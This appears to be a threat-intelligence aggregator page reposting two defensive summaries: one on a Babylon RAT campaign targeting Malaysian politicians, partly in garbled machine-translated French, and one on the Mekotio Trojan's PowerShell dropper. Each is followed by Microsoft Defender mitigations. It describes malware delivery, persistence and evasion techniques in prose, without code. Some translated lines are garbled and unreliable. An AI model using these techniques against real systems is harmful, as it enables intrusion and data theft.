One Article Review
| Source |  RiskIQ |
|---|---|
| Identifiant | 8571438 |
| Date de publication | 2024-09-06 18:14:35 (vue: 2024-09-06 18:18:13) |
| Titre | La campagne complexe de rat de Babylon cible les politiciens malaisiens, le gouvernement The Intricate Babylon RAT Campaign Targets Malaysian Politicians, Government (Recyclage) |
| Texte | #### Géolocations ciblées - Malaisie #### Industries ciblées - agences et services gouvernementaux ## Instantané Des chercheurs du Cyble Research and Intelligence Lab (CRIL) ont découvert une campagne de cyberattaque ciblée contre les personnalités politiques et les responsables gouvernementaux en Malaisie. ## Description Cette campagne, active depuis juillet, utilise des fichiers ISO malveillants qui contiennent une variété d'éléments trompeurs tels que les fichiers de raccourcis (LNK), les scripts PowerShell cachés, les exécutables malveillants et les documents PDF leurres.L'objectif principal de ces fichiers est de déployer Babylon Rat, un cheval de Troie (rat) à accès à distance open source qui fournit aux attaquants un contrôle non autorisé sur les systèmes compromis. Lors de l'exécution, les fichiers ISO chargés de malware utilisent des scripts PowerShell pour lancer le PDF leurre lors de l'installation de l'exécutable malveillant sur la machine de la victime.Cet exécutable établit ensuite la persistance en modifiant le registre Windows, garantissant qu'il s'exécute sur le démarrage du système.La charge utile finale, Babylon Rat, permet aux attaquants d'exécuter à distance des commandes, de capturer des frappes, de voler des mots de passe et d'exfiltrer des données sensibles. La campagne semble être une continuation des efforts antérieurs du même acteur de menace, qui a auparavant utilisé Quasar Rat, un autre rat open-source, pour cibler les entités malaisiennes.Les attaquants exploitent des tactiques avancées telles que la résolution d'API dynamique et le cryptage multicouches pour échapper à la détection et maintenir l'accès aux systèmes compromis. ## Recommandations Microsoft recommande les atténuations suivantes pour réduire l'impact de cette menace. - Allumez [Protection en livraison du cloud] (https://learn.microsoft.com/en-us/defender-endpoint/linux-preférences) dans Microsoft Defender Antivirus ou l'équivalent de votre produit antivirus pour couvrir rapidement les outils d'attaquant en évolution et et et les outils d'attaquant en évolution rapide ettechniques.Les protections d'apprentissage automatique basées sur le cloud bloquent la majorité des menaces nouvelles et inconnues. - Exécuter [EDR en mode bloc] (https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide?ocid=Magicti_TA_LearnDoc)Le défenseur du point final peut bloquer les artefacts malveillants, même lorsque votre antivirus non microsoft ne détecte pas la menace ou lorsque Microsoft Defender Antivirus fonctionne en mode passif.EDR en mode bloc fonctionne dans les coulisses pour corriger les artefacts malveillants qui sont détectés post-abri. - Autoriser [enquête et correction] (https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide?ocid=Magicti_TA_LearnDoc) en mode automatisé complet pour permettre à Microsoft Defender le point de terminaison de prendre des mesures immédiates sur les alertes pour résoudre les violations, réduisant considérablement le volume d'alerte. - [Activé] (https://learn.microsoft.com/en-us/defender-endpoint/enable-ctrelled-folders) Accès aux dossiers contrôlés. - Assurez-vous que [Protection de stimulation] (https://learn.microsoft.com/en-us/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection#how-do-i-configure-Or-Manage-Tamper-Protection) est activé dans Microsoft Defender pour Endpoint. - Activer [Protection réseau] (https://learn.microsoft.com/en-us/defender-endpoint/enable-network-protection) dans Microsoft Defender pour le point de terminaison. - Suivez les recommandations de durcissement des informations d'identification dans la [vue d'ensemble du vol d'identification sur prémisse] (https://security.microsoft.com/Thereatanalytics3/9382203E-5155-4B5E-AF74-21562B1004D5/analyStreport) pour défendre contre des techniques d |
| Notes | ★★ |
| Envoyé | Oui |
| Condensat | ### #### **© 2024 2024** 21562b1004d5/analystreport 365/security/defender 4b5e 5155 access accessed action active actor advanced af74 against age agencies alert alerts all allow allows another antivirus antivirus any api appears are artifacts attack attacker attackers authority babylon backdoor:win32/dodiw based behind block breach breaches campaign can capture changes client cloud com/blog/the com/en com/microsoft com/threatanalytics3/9382203e commands common components compromised configure contain content continuation control controlled copyright cover credential cril criterion customers cyber cyble data deceptive decoy defend defender delivered deploy description detect detected detection detections/hunting detects distribution documents does dynamic edr efforts elements email enable enabled encryption encyclopedia endpoint endpoint/attack endpoint/automated endpoint/edr endpoint/enable endpoint/linux endpoint/prevent ensure ensuring entities equivalent establishes evade even evolving executable executables execute execution exfiltrate figures files final folder folders follow following from fullautomated geolocations government government/ hacktool:win32/autokms hardening have hidden https://cyble https://learn https://security https://www immediate impact industries installing intelligence intricate investigation investigations iso july keystrokes lab laden launch layer learndoc learning leverage like list lnk local lsa lsass machine maintain majority malaysia malaysian malicious malware malware: manage meet microsoft mitigations mode modifying multi name=backdoor:win32/dodiw name=hacktool:win32/autokms name=trojan:win32/coinminer network new non not objective ocid=magicti officials open over overview part passive passwords payload pdf permission persistence political politicians post powershell preferences premises prevalence prevent previously primary prior product prohibited protection protection#how protections provides quasar queries ransomware rapidly rat recommendations recommends reduce reducing reduction reference#block references registry remediate remediation remote remotely reproduction research researchers reserved resolution resolve rights rule rules run running runs same scenes scripts security sensitive services settings shortcut significantly since site snapshot source startup steal stealing subsystem such surface system systems tactics take tamper target targeted targets techniques theft then thereof these threat threats tools trojan trojan:win32/coinminer trusted turn unauthorized uncovered unknown unless upon us/defender us/wdsi/threats/malware use used utilizes variety victim view=o365 volume webmail when who windows without works worldwide written xdr your |
| Tags | Ransomware Malware Tool Threat |
| Stories | |
| Move | 
|
Les reprises de l'article (1):
| Source | RiskIQ |
|---|---|
| Identifiant | 8570653 |
| Date de publication | 2024-09-05 16:44:40 (vue: 2024-09-05 17:18:12) |
| Titre | Analyse du Trojan Mekotio Analyzing the Mekotio Trojan (Recyclage) |
| Texte | ## Snapshot Researchers at Cyfirma released an article about Mekotio Trojan, a sophisticated piece of malware that uses a PowerShell-based dropper to distribute its payload. ## Description The dropper is heavily obfuscated, employing techniques like custom XOR decryption to hide key details. Upon execution, the dropper gathers system information and communicates with a command-and-control (C2) server to receive additional payloads and instructions. It also ensures persistence by modifying system settings to execute the malware upon system startup. Key functions of the PowerShell script include generating random strings, decoding encrypted data, retrieving system details, checking for antivirus software, and managing file transfers via TCP connections. The malware\'s primary payload consists of executable and script files, which are extracted, renamed, and executed. The dropper creates shortcuts to these payloads and adds them to the Windows registry to maintain persistence. Observed C2 communication suggests the threat actors may be of Portuguese or Brazilian origin. ## Additional Analysis Threat actors frequently use PowerShell in their attacks due to its powerful capabilities, deep integration with the Windows operating system, and the fact that it is a trusted and pre-installed tool on nearly all Windows systems. Unlike other scripting languages, PowerShell allows attackers to interact directly with the Windows API, manipulate system settings, and execute commands in memory, making detection more challenging for traditional antivirus solutions that rely on file-based signatures. PowerShell\'s versatility allows threat actors to write sophisticated scripts that can download additional payloads, obfuscate commands, perform privilege escalation, and achieve persistence on the infected system. Additionally, PowerShell scripts can be easily obfuscated to evade detection and analysis, leveraging techniques like base64 encoding, string concatenation, or custom encryption methods. The ability to run in-memory (fileless) attacks without leaving traces on the disk further complicates detection by endpoint protection tools. Overall, PowerShell\'s flexibility, stealth, and integration with Windows make it an attractive choice for threat actors seeking to conduct effective and evasive attacks. ## Recommendations Microsoft recommends the following mitigations to reduce the impact of this threat. - Turn on [cloud-delivered protection](https://learn.microsoft.com/en-us/defender-endpoint/linux-preferences) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats. - Run [EDR in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide?ocid=magicti_ta_learndoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach. - Allow [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide?ocid=magicti_ta_learndoc) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume. - [Enable](https://learn.microsoft.com/en-us/defender-endpoint/enable-controlled-folders) controlled folder access. - Ensure that [tamper protection](https://learn.microsoft.com/en-us/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection#how-do-i-configure-or-manage-tamper-protection) is enabled in Microsoft Defender for Endpoint. - Enable [network protection](https://learn.microsoft.com/en-us/defender-endpoint/enable-network-pro |
| Notes | ★★ |
| Envoyé | Oui |
| Condensat | **© 2024 2024** 20activities 20for 20is 20malicious 20of 20one 20various 20versatility 21562b1004d5/analystreport 365/security/defender 4b5e 5155 ability about access accessed achieve action actors additional additionally adds af74 against age alert alerts all allow allows also analysis analyzing antivirus any api are article artifacts attack attacker attackers attacks attacks/#:~:text=powershell attractive authority automated base64 based behind block blue brazilian breach breaches can capabilities center challenging changes checking choice cisecurity client cloud com/blog/the com/en com/microsoft com/research/analyzing com/threatanalytics3/9382203e command commands common communicates communication complicates concatenation conduct configure connections consists content control controlled copyright cover creates credential criterion custom customers cyber cyfirma data decoding decryption deep defend defender delivered description details detect detected detection directly disk distribute distribution does download dropper due easily edr effective email employing enable enabled encoding encrypted encryption endpoint endpoint/attack endpoint/automated endpoint/edr endpoint/enable endpoint/linux endpoint/prevent ensure ensures equivalent escalation evade evasive even evolving executable execute executed execution exploit exploiting extracted fact file fileless files flexibility folder folders follow following frequently from full functions further gathers generating goat hackers hardening heavily hide how https://bluegoatcyber https://learn https://security https://www immediate impact include infected information insights insights: installed instructions integration intel interact internet investigation investigations its key languages learndoc learning leaving leveraging like list local lsa lsass machine maintain majority make making malicious malware manage managing manipulate may meet mekotio memory methods microsoft mitigations mode modifying more nearly network new non not obfuscate obfuscated observed ocid=magicti operating org/insights/white origin other overall overview papers/intel part passive payload payloads perform permission persistence piece portuguese post power powerful powershell pre preferences premises prevalence prevent primary privilege product prohibited protection protection#how protections random ransomware rapidly receive recommendations recommends reduce reducing reduction reference#block references registry released rely remediate remediation renamed reproduction researchers reserved resolve retrieving rights rule rules run running scenes script scripting scripts secure security seeking server settings shortcuts signatures significantly site snapshot software solutions sophisticated startup stealing stealth string strings subsystem suggests suitable surface system systems take tamper tcp techniques theft them thereof these threat threats tool tools traces traditional transfers trojan trojan/ trusted turn unknown unless unlike upon us/defender use used uses versatility view=o365 volume webmail when which windows without works worldwide write written xdr xor your |
| Tags | Ransomware Malware Tool Threat |
| Stories | |
| Move |
|
L'article ne semble pas avoir été repris sur un précédent.